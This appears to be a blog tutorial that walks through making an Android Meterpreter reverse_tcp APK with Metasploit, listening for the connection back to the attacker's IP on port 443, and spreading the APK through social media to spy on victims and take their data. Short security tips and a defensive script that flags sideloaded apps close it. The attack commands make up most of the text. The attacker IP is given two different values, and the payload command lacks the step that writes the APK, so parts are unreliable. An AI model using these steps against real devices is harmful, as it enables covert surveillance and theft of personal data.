Step-by-step process to hack an Android phone using Metasploit 2017, and how to secure it

By Admin
At the request of many readers, today I am going to show you how an Android mobile can be hacked using Metasploit. Follow the method below step by step. Before going to the first step, you need to know the following terms.

1) The IP of the attacker: 192.168.8.94 (let's assume, in my case).

2) The attacker will need a port for receiving connections from other systems: 443

Requirements:

1. First you need the Metasploit framework (in this tutorial we are going to use Kali Linux 1.0.6). If you have not installed Kali on your system, search for that tutorial on this site.

2. Obviously you need an Android device (we use an LG with Android 4.4 KitKat).

Step by Step Hacking Android Smartphone Tutorial using Metasploit:


Step:1) First of all, open a terminal. If you don't know how, simply press CTRL + ALT + T.

Step:2) After that, you'll need to use the Metasploit payload framework with the command given below.

    msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

Make sure that you enter the attacker's IP address here. We considered the IP to be 182.158.18.67 (this is the static IP of the attacker, not a dynamic one). If you don't understand, please see the picture below.

 

Step:3) Now go to your console. If you don't know how to get to the console window, simply type msfconsole.

 



Info:

    use exploit/multi/handler --> we will use the Metasploit handler
    set payload android/meterpreter/reverse_tcp --> make sure the payload is the same as in step 2

Step:4) The next step is to configure the switches for the Metasploit payload.




Info:

    set lhost 192.168.8.94 --> attacker IP address
    set lport 443 --> port to listen on for the reverse connection
    exploit --> start listening for the incoming connection

Step:5) In this way the attacker gets an APK file, or we can say a malicious APK file, and only needs to start distributing it via any medium, for example Facebook, WhatsApp, Twitter, etc.

Step:6) Now suppose I am the victim, and I download that malicious application and install it on my phone. After the installation, the attacker's Metasploit console shows something about me, like this:



Step:7) The screen above means that the attacker has hacked your phone successfully and will be able to get enough data from your smartphone. It means the attacker can do everything with your mobile: he can spy on you, and stealing your sensitive data becomes a very easy task for him.





Security Tips:

  1. Don't install APKs from unknown sources. Always prefer the Google Play Store, although sometimes Google is also not able to determine which apps are good for your smartphone.
  2. Disable installation from unknown sources in the settings. If you don't know how to block unknown sources, mail me.
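
A defender-side check for the two tips above, as an added example that is not part of the original post: it parses the output of `adb shell pm list packages -3 -i` (user-installed packages with their recorded installer) and flags every app that did not come from Google Play. The sample output and package names are constructed, and treating only `com.android.vending` as trusted is an assumption.

```python
import re

# Assumption: only Google Play counts as a trusted installer on this device.
TRUSTED_INSTALLERS = {"com.android.vending"}

# Constructed sample of `adb shell pm list packages -3 -i` output.
SAMPLE_PM_OUTPUT = """\
package:com.example.chat  installer=com.android.vending
package:com.example.freegame  installer=null
package:org.example.notes  installer=com.android.packageinstaller
package:com.example.bank installer=com.android.vending
package:com.example.tool

this line is not a package entry and is skipped
"""

LINE_RE = re.compile(r"^package:(?P<pkg>\S+)(?:\s+installer=(?P<inst>\S+))?$")


def parse_packages(pm_output):
    """Yield (package, installer); installer is None if missing or 'null'."""
    for line in pm_output.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # ignore blank lines and anything that is not an entry
        installer = match.group("inst")
        if installer in (None, "null"):
            installer = None
        yield match.group("pkg"), installer


def sideloaded_packages(pm_output, trusted=TRUSTED_INSTALLERS):
    """Return (package, installer) pairs not installed by a trusted store."""
    flagged = [(pkg, inst) for pkg, inst in parse_packages(pm_output)
               if inst not in trusted]
    return sorted(flagged, key=lambda item: item[0])


if __name__ == "__main__":
    for pkg, inst in sideloaded_packages(SAMPLE_PM_OUTPUT):
        print(f"review: {pkg} (installer: {inst or 'none recorded'})")
```

A flagged package is not necessarily malicious; it is an app installed outside the store and therefore worth reviewing or removing.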